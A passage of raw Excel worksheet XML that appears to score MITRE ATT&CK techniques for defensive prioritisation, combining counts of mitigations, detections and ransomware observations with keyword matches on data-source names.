        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16666666666666669</v>
      </c>
      <c r="W270">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X270">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y270">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z270">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA270">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB270">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC270" s="29" t="s">
        <v>1144</v>
      </c>
      <c r="AD270" s="25" t="str" cm="1">
        <f t="array" ref="AD270">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC270)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE270" s="25">
        <f>IF(AD270="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF270" s="25" t="str" cm="1">
        <f t="array" ref="AF270">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC270)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG270" s="25">
        <f>IF(AF270="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH270" s="25" t="str" cm="1">
        <f t="array" ref="AH270">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC270)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI270" s="25">
        <f>IF(AH270="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ270" s="25" t="str" cm="1">
        <f t="array" ref="AJ270">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC270)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK270" s="25">
        <f>IF(AJ270="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL270" s="25" t="str" cm="1">
        <f t="array" ref="AL270">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC270)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM270" s="25">
        <f>IF(AL270="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN270" s="60">
        <v>1</v>
      </c>
      <c r="AO270" s="51">
        <v>1</v>
      </c>
      <c r="AP270" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.3520000000000007E-2</v>
      </c>
      <c r="AQ270" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10062222222222227</v>
      </c>
      <c r="AR270" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10062222222222227</v>
      </c>
      <c r="AS270" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT270" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU27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71" spans="1:47" ht="32.1">
      <c r="A271" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.481666666666667E-2</v>
      </c>
      <c r="B271" s="25">
        <f>SUM(H271,M271,V271)*(1+SUM(AE271,AG271,AI271,AK271,AM271))</f>
        <v>0.41483333333333333</v>
      </c>
      <c r="C271" s="25" t="s">
        <v>1145</v>
      </c>
      <c r="D271" s="25" t="s">
        <v>863</v>
      </c>
      <c r="E271" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F271" s="51">
        <v>2</v>
      </c>
      <c r="G271" s="51">
        <v>1</v>
      </c>
      <c r="H271" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I271">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J271">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K271">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L271">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M271" s="25">
        <v>0</v>
      </c>
      <c r="N271" s="51">
        <v>0</v>
      </c>
      <c r="O271" s="51">
        <v>3</v>
      </c>
      <c r="P271" s="51">
        <v>4</v>
      </c>
      <c r="Q271" s="51">
        <v>1</v>
      </c>
      <c r="R271" s="52" t="s">
        <v>1146</v>
      </c>
      <c r="S271" s="51">
        <v>6</v>
      </c>
      <c r="T271" s="52" t="s">
        <v>415</v>
      </c>
      <c r="U271" s="51">
        <v>7</v>
      </c>
      <c r="V271" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16190476190476191</v>
      </c>
      <c r="W271">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>13</v>
      </c>
      <c r="X271">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Y271">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.23636363636363636</v>
      </c>
      <c r="Z271">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA271">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB271">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC271" s="29" t="s">
        <v>1147</v>
      </c>
      <c r="AD271" s="25" t="str" cm="1">
        <f t="array" ref="AD271">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC271)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE271" s="25">
        <f>IF(AD271="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF271" s="25" t="str" cm="1">
        <f t="array" ref="AF271">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC271)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG271" s="25">
        <f>IF(AF271="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH271" s="25" t="str" cm="1">
        <f t="array" ref="AH271">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC271)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI271" s="25">
        <f>IF(AH271="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ271" s="25" t="str" cm="1">
        <f t="array" ref="AJ271">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC271)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK271" s="25">
        <f>IF(AJ271="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL271" s="25" t="str" cm="1">
        <f t="array" ref="AL271">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC271)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM271" s="25">
        <f>IF(AL271="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN271" s="52">
        <v>1</v>
      </c>
      <c r="AO271" s="51">
        <v>1</v>
      </c>
      <c r="AP271" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.481666666666667E-2</v>
      </c>
      <c r="AQ271" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13827777777777778</v>
      </c>
      <c r="AR271" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13827777777777778</v>
      </c>
      <c r="AS271" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT271" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU27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72" spans="1:47" ht="48">
      <c r="A272" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.6314285714285713E-2</v>
      </c>
      <c r="B272" s="25">
        <f>SUM(H272,M272,V272)*(1+SUM(AE272,AG272,AI272,AK272,AM272))</f>
        <v>0.2964761904761905</v>
      </c>
      <c r="C272" s="25" t="s">
        <v>1148</v>
      </c>
      <c r="D272" s="25" t="s">
        <v>391</v>
      </c>
      <c r="E272" s="25" t="s">
        <v>1149</v>
      </c>
      <c r="F272" s="51">
        <v>1</v>
      </c>
      <c r="G272" s="51">
        <v>1</v>
      </c>
      <c r="H272" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I272">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J272">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K272">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L272">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M272" s="25">
        <v>0</v>
      </c>
      <c r="N272" s="51">
        <v>0</v>
      </c>
      <c r="O272" s="51">
        <v>0</v>
      </c>
      <c r="P272" s="51">
        <v>0</v>
      </c>
      <c r="Q272" s="51">
        <v>0</v>
      </c>
      <c r="R272" s="52" t="s">
        <v>1150</v>
      </c>
      <c r="S272" s="51">
        <v>7</v>
      </c>
      <c r="T272" s="51" t="s">
        <v>1151</v>
      </c>
      <c r="U272" s="51">
        <v>10</v>
      </c>
      <c r="V272" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16190476190476191</v>
      </c>
      <c r="W272">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X272">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y272">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z272">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA272">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB272">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC272" s="29" t="s">
        <v>1152</v>
      </c>
      <c r="AD272" s="25" t="str" cm="1">
        <f t="array" ref="AD272">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC272)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE272" s="25">
        <f>IF(AD272="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF272" s="25" t="str" cm="1">
        <f t="array" ref="AF272">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC272)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG272" s="25">
        <f>IF(AF272="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH272" s="25" t="str" cm="1">
        <f t="array" ref="AH272">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC272)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI272" s="25">
        <f>IF(AH272="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ272" s="25" t="str" cm="1">
        <f t="array" ref="AJ272">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC272)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK272" s="25">
        <f>IF(AJ272="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL272" s="25" t="str" cm="1">
        <f t="array" ref="AL272">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC272)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM272" s="25">
        <f>IF(AL272="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN272" s="52">
        <v>2</v>
      </c>
      <c r="AO272" s="51">
        <v>1</v>
      </c>
      <c r="AP272" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>9.6314285714285713E-2</v>
      </c>
      <c r="AQ272" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.882539682539683E-2</v>
      </c>
      <c r="AR272" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.882539682539683E-2</v>
      </c>
      <c r="AS272" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT272" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU27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73" spans="1:47" ht="48">
      <c r="A273" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.9647619047619048E-2</v>
      </c>
      <c r="B273" s="25">
        <f>SUM(H273,M273,V273)*(1+SUM(AE273,AG273,AI273,AK273,AM273))</f>
        <v>0.2964761904761905</v>
      </c>
      <c r="C273" s="25" t="s">
        <v>1153</v>
      </c>
      <c r="D273" s="25" t="s">
        <v>241</v>
      </c>
      <c r="E273" s="25" t="s">
        <v>1154</v>
      </c>
      <c r="F273" s="51">
        <v>1</v>
      </c>
      <c r="G273" s="51">
        <v>1</v>
      </c>
      <c r="H273" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I273">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J273">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K273">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L273">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M273" s="25">
        <v>0</v>
      </c>
      <c r="N273" s="51">
        <v>0</v>
      </c>
      <c r="O273" s="51">
        <v>0</v>
      </c>
      <c r="P273" s="51">
        <v>0</v>
      </c>
      <c r="Q273" s="51">
        <v>0</v>
      </c>
      <c r="R273" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S273" s="51">
        <v>2</v>
      </c>
      <c r="T273" s="51" t="s">
        <v>242</v>
      </c>
      <c r="U273" s="51">
        <v>15</v>
      </c>
      <c r="V273" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16190476190476191</v>
      </c>
      <c r="W273">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X273">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y273">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z273">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA273">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB273">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC273" s="29" t="s">
        <v>442</v>
      </c>
      <c r="AD273" s="25" t="str" cm="1">
        <f t="array" ref="AD273">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC273)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE273" s="25">
        <f>IF(AD273="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF273" s="25" t="str" cm="1">
        <f t="array" ref="AF273">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC273)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG273" s="25">
        <f>IF(AF273="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH273" s="25" t="str" cm="1">
        <f t="array" ref="AH273">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC273)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI273" s="25">
        <f>IF(AH273="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ273" s="25" t="str" cm="1">
        <f t="array" ref="AJ273">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC273)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK273" s="25">
        <f>IF(AJ273="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL273" s="25" t="str" cm="1">
        <f t="array" ref="AL273">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC273)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM273" s="25">
        <f>IF(AL273="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN273" s="52">
        <v>0</v>
      </c>
      <c r="AO273" s="51">
        <v>0</v>
      </c>
      <c r="AP273" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.9647619047619048E-2</v>
      </c>
      <c r="AQ273" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.882539682539683E-2</v>
      </c>
      <c r="AR273" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.882539682539683E-2</v>
      </c>
      <c r="AS273" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT273" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU27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74" spans="1:47">
      <c r="A274" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1376190476190474E-2</v>
      </c>
      <c r="B274" s="25">
        <f>SUM(H274,M274,V274)*(1+SUM(AE274,AG274,AI274,AK274,AM274))</f>
        <v>0.31376190476190474</v>
      </c>
      <c r="C274" s="25" t="s">
        <v>1155</v>
      </c>
      <c r="D274" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E274" s="25" t="s">
        <v>1156</v>
      </c>
      <c r="F274" s="51">
        <v>1</v>
      </c>
      <c r="G274" s="51">
        <v>1</v>
      </c>
      <c r="H274" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I274">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J274">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K274">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L274">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M274" s="25">
        <v>0</v>
      </c>
      <c r="N274" s="51">
        <v>0</v>
      </c>
      <c r="O274" s="51">
        <v>0</v>
      </c>
      <c r="P274" s="51">
        <v>0</v>
      </c>
      <c r="Q274" s="51">
        <v>0</v>
      </c>
      <c r="R274" s="52" t="s">
        <v>1157</v>
      </c>
      <c r="S274" s="51">
        <v>4</v>
      </c>
      <c r="T274" s="52" t="s">
        <v>1158</v>
      </c>
      <c r="U274" s="51">
        <v>13</v>
      </c>
      <c r="V274" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.16190476190476191</v>
      </c>
      <c r="W274">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X274">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y274">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z274">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA274">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB274">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC274" s="29" t="s">
        <v>1159</v>
      </c>
      <c r="AD274" s="25" t="str" cm="1">
        <f t="array" ref="AD274">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC274)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE274" s="25">
        <f>IF(AD274="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF274" s="25" t="str" cm="1">
        <f t="array" ref="AF274">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC274)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG274" s="25">
